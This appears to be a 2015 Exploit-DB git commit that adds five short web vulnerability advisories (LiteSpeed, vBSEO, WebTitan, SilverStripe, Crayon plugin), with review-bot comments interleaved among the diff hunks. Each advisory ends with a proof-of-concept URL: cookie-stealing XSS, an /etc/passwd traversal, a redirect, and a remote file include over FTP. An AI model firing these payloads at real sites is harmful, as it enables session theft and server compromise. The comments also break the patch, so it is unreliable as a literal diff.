From 94f93b8c9abd866796a502324fdb7376c10cf877 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 24 Aug 2015 05:01:58 +0000
Subject: [PATCH] DB: 2015-08-24 5 new exploits
---
 files.csv | 5 +++++
 platforms/multiple/remote/37947.txt | 9 +++++++++
 platforms/php/webapps/37943.txt | 9 +++++++++
 platforms/php/webapps/37944.txt | 11 +++++++++++
 platforms/php/webapps/37945.txt | 9 +++++++++
 platforms/php/webapps/37946.txt | 9 +++++++++
 6 files changed, 52 insertions(+)
 create mode 100755 platforms/multiple/remote/37947.txt
 create mode 100755 platforms/php/webapps/37943.txt
 create mode 100755 platforms/php/webapps/37944.txt
 create mode 100755 platforms/php/webapps/37945.txt
 create mode 100755 platforms/php/webapps/37946.txt
diff --git a/files.csv b/files.csv
index d430e6272..2839bd36b 100755
--- a/files.csv
+++ b/files.csv
@@ -34082,6 +34082,7 @@ id,file,description,date,author,platform,type,port
 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
+37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
 37758,platforms/win32/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ (199 Bytes Null-Free)",2015-08-12,noviceflux,win32,shellcode,0
 37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0
@@ -34124,6 +34125,10 @@ id,file,description,date,author,platform,type,port
 37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
+37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal Vulnerability",2012-10-20,"Richard Conner",php,webapps,0
+37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting Vulnerability",2012-06-16,MegaMan,php,webapps,0
+37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x 'BackURL' Parameter URI Redirection Vulnerability",2012-10-15,"Aung Khant",php,webapps,0
+37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0
 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0
 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0
 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0
diff --git a/platforms/multiple/remote/37947.txt b/platforms/multiple/remote/37947.txt
new file mode 100755
index 000000000..7f77d4d1a
--- /dev/null
+++ b/platforms/multiple/remote/37947.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55946/info
+
+LiteSpeed Web Server is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+LiteSpeed Web Server 4.1.11 and prior versions are vulnerable.
+
+http://www.exxample.com/service/graph_html.php?gtitle=VHOSTa%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37943.txt b/platforms/php/webapps/37943.txt
new file mode 100755
index 000000000..3ebf4586b
--- /dev/null
+++ b/platforms/php/webapps/37943.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55904/info
+
+WebTitan is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files containing sensitive information that could aid in further attacks.
+
+WebTitan Versions prior to 3.60 are vulnerable.
+
+http://www.example.com//logs-x.php? jaction=view&fname=../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/37944.txt b/platforms/php/webapps/37944.txt
new file mode 100755
index 000000000..f51c12414
--- /dev/null
+++ b/platforms/php/webapps/37944.txt
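Review bot: The sample URL on the last line of 37947.txt uses the host `www.exxample.com`, which is not a reserved documentation name, while the other four advisories added in this commit use `www.example.com`; a regression test or scanner fixture built from this line would send its request to a domain a third party can register. The host should read `www.example.com`, with the path and query string left as they are. The text also ends at "4.1.11 and prior versions are vulnerable" without any fix guidance; a closing line saying that `gtitle` must be HTML-encoded before `graph_html.php` writes it into the page, and that an HttpOnly session cookie limits the cookie theft described, would make the entry usable for remediation.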
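Review bot: 37943.txt gives the affected range ("Versions prior to 3.60") but neither remediation nor detection guidance. Suggest appending `Fix: upgrade to WebTitan 3.60 or later.`, which is inferred from the stated range and should be confirmed against the vendor advisory, plus a sentence that `fname` has to be resolved to a canonical path and rejected unless it stays inside the log directory. For triage, the indicator this entry supports is access-log requests to `logs-x.php` whose `fname` value contains `../` sequences, raw or URL-encoded.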
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/55908/info
+
+vBSEO is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+vBSEO 3.8.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/forums/member.php?tab=friends&u=11411%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E
+
+http://www.example.com/forum/member.php?u=1%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37945.txt b/platforms/php/webapps/37945.txt
new file mode 100755
index 000000000..8fa2d181c
--- /dev/null
+++ b/platforms/php/webapps/37945.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55915/info
+
+SilverStripe is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+SilverStripe 2.4.7 and prior are vulnerable.
+
+http://www.example.com/index.php/Security/login?BackURL=http://example1.com
\ No newline at end of file
diff --git a/platforms/php/webapps/37946.txt b/platforms/php/webapps/37946.txt
new file mode 100755
index 000000000..73b49b7a9
--- /dev/null
+++ b/platforms/php/webapps/37946.txt
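Review bot: Both sample URLs in 37944.txt embed a live third-party site, `www.internot.info`, as the redirect target, so any test case or training copy built from this file points a browser at a host outside the maintainers' control. Replace it in both lines with a reserved name such as `www.example.net`, in line with the `www.example.com` host already used for the affected site. The two samples also disagree on the forum path (`/forums/member.php` and `/forum/member.php`); a one-line remark that the path depends on the installation would keep readers from treating them as two separate endpoints when writing detections for the `u` parameter.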
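Review bot: 37945.txt says the application "fails to properly sanitize user-supplied input" but never states what an acceptable `BackURL` is, so the entry gives a maintainer nothing to check a fix against. Suggest adding a sentence along the lines of `BackURL should be honoured only when it is a relative path or resolves to the site's own host; any other value should fall back to the default landing page.` The sample also uses `example1.com` as the external target, which is not a reserved documentation name, unlike `example.com`; `example.net` would be the safe substitute. No fixed release is named beyond "2.4.7 and prior", which is worth stating explicitly if the vendor advisory gives one.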
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55919/info
+
+The Crayon Syntax Highlighter plug-in for WordPress is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Crayon Syntax Highlighter 1.12.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php
\ No newline at end of file
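Review bot: The impact paragraph in 37946.txt claims code execution "in the context of the web server process" without stating the precondition, which readers need in order to assess their own exposure. Including an `ftp://` URL presumably only succeeds where PHP's `allow_url_include` is enabled; this is hedged because the plugin code is not shown on this page. Suggest adding `Note: remote inclusion requires allow_url_include=On; confirm whether local paths passed in wp_load are still included when it is off.` Remediation text is missing as well: `util/ajax.php` should not take the `wp_load` path from the request at all, and no fixed release is named beyond "1.12.1 is vulnerable".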